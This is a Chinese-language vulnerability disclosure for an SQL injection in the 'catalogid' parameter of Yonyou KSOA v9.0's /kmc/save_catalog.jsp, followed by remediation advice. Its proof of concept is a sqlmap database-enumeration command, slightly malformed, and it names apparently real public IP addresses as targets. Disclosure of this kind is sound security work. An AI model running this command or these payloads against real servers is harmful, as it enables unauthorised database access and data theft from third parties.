漏洞关键信息 名称和版本 产品名称: Yonyou Space-Time Enterprise Information Integration KSOA Platform 受影响版本: v9.0 漏洞类型 SQL injection 漏洞文件 /kmc/save_catalog.jsp 漏洞根因 应用程序通过将“catalogid”参数的不可信输入直接拼接到SQL查询中,而没有适当的验证或参数化。特别是影响使用MS SQL Server的环境,如通过时间延迟负载指示的那样。 影响 攻击者可以利用SQL注入漏洞实现对数据库的未经授权访问、敏感数据泄漏、数据篡改,并且可能获得数据库服务器的管理控制。这对系统的机密性、完整性和可用性构成了严重威胁。 漏洞详情和PoC 漏洞URL: http://139.129.39.196:98/kmc/save_catalog.jsp 漏洞参数: catalogid 方法: GET 生产命令 python sqlmap.py -u "http:[:[:218.207.206.172:5080/kmc/save_catalog.jsp?catalogid=1]" --dbms=mssql --batch --dbs 建议修复 1. 使用预编译语句: 对于所有数据库访问实现参数化查询。这可以确保数据库将用户输入视为数据,而不是可执行代码。 2. 输入验证: 严格验证'catalogid'参数以确保它只包含预期字符(例如,仅整数)。 3. WAF配置: 部署Web应用防火墙 (WAF) 以检测和阻止常见的SQL注入模式。 4. 错误处理**: 在前端禁用详细的数据库错误消息以防止信息泄漏。